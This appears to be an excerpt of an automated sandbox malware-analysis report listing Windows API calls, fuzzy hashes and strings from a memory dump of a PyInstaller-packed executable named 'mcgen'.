                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C331E562B08A6142E6209F69B8102FA7799BF897EAF400136EF4DD3799DF3CD506C340
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DDBD
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DDCB
                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DDF5
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DE63
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF6B9F1DFEA,?,?,?,00007FF6B9F1DCDC,?,?,?,00007FF6B9F1D8D9), ref: 00007FF6B9F1DE6F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                    • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                    • Instruction ID: 45193643e34a6f57ec8a05fac5115b39864309d1f9f10769b84b6313b6cfb376
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1031C6A1B1A66291EE21DF1AA80057523ACFF59BB3F4A4535EF1D87394DF3CE4448360
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                    • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                                    • Instruction ID: 97204bd2ee85d3d6ad1084c1e85c0ccb472648f685519b5a01a069e9fe06400d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E41B6B1B0C6A791EA21DF68E4142E96319FF453A6F900132DB5C83295EF3CE505C780
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6B9F1351A,?,00000000,00007FF6B9F13F23), ref: 00007FF6B9F12AA0
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                                    • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                    • Instruction ID: 5156faef99e6268b941c9bc9359db9440201f0fa57396ee7d78b85c7e725cfde
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A217C72A18B9182E7209F69B8817E67398FB897E6F400136FF8C93659DF3CD2458740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                    • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                                    • Instruction ID: 7702993e72f95e550cb08bb26b5e8cdc23441132250278a9c96e302489e53273
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1211620A0C28642FA69AB7A665123D715A9F857F3F144638FA3E87AD6DE3CA4418701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                    • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                    • Instruction ID: dc262087f25c4bf892e7eb016f60f48cf466c1f39989985dafa0d778ffa4ef59
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7117F21A18A4186E7609F6AA85433966A8BB88BF6F000234EB5DC77A4DF7CD9448B41
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F18592
                                                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F185E9
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6B9F19400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6B9F145E4,00000000,00007FF6B9F11985), ref: 00007FF6B9F19439
                                                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F18678
                                                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F186E4
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F186F5
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF6B9F19216), ref: 00007FF6B9F1870A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                    • Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                                    • Instruction ID: f7d0532b8a7a046eb6e68b1a78811d12a2034af74e13b223fd48407dc2950473
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41D8A2B196A242EA30DF1AA5406BA6398FF85BE6F440135DF9DD7B89DF3CD401C740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B347
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B37D
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3AA
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3BB
                                                                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3CC
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,?,00007FF6B9F24F81,?,?,?,?,00007FF6B9F2A4FA,?,?,?,?,00007FF6B9F271FF), ref: 00007FF6B9F2B3E7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                    • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                                    • Instruction ID: 4c5ce0847bf34fa6bb83aa4bd2d5a0be381ca7898600b267cfe4230e49de134b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67112920A0C68282FA54AF79565123D714A9F857F3F244739FE2EC77D6DE3CA8018701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6B9F11B6A), ref: 00007FF6B9F1295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                    • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                    • Instruction ID: d7c672dfbc72c880207aa5923984d294bc80da227d93b1677f10017ea52a6a2a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27310462B1869142E7209B69A8402F67298BF897E6F400132FF8CC3795EF3CD146C340
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                    • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                    • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                    • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                                    • Instruction ID: c2b4ee5128020f2e479a51bb448a96ee6a389f4cb2a1a6dd43dbfb19ddb80941
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84316A72A19A9289EB20EF69E8542F97368FF897A5F400135EB4D8BA59DF3CD1008701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6B9F1918F,?,00007FF6B9F13C55), ref: 00007FF6B9F12BA0
                                                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF6B9F12C2A
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                    • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                    • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                    • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                    • Instruction ID: 86542f4ff1da0bb9f3449de819b5a2bbc82df7417289ca79b2ff98e28abadfb4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A21BC62B08B9182E7209F68F8807EA73A8EB887D5F400132EB8D93659DE3CD245C740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6B9F11B99), ref: 00007FF6B9F12760
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                                    • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                    • Instruction ID: ac74a519448d65734831d022d3416781cfbd48abb99fbc04aadad335d6106a2a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1217C72A18B9182E720DF69B8817E66398FB893E5F400136FB8C83659DF7CD2458740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                    • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                    • Instruction ID: 85f45718dfde5b5077e50aa88789ac5f0f1850b8e3552ee35928d5af45cb2c17
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F04F61A0960681EA208F38E4953796328EF457B3F540235DB6E872E5DF3CD1848700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
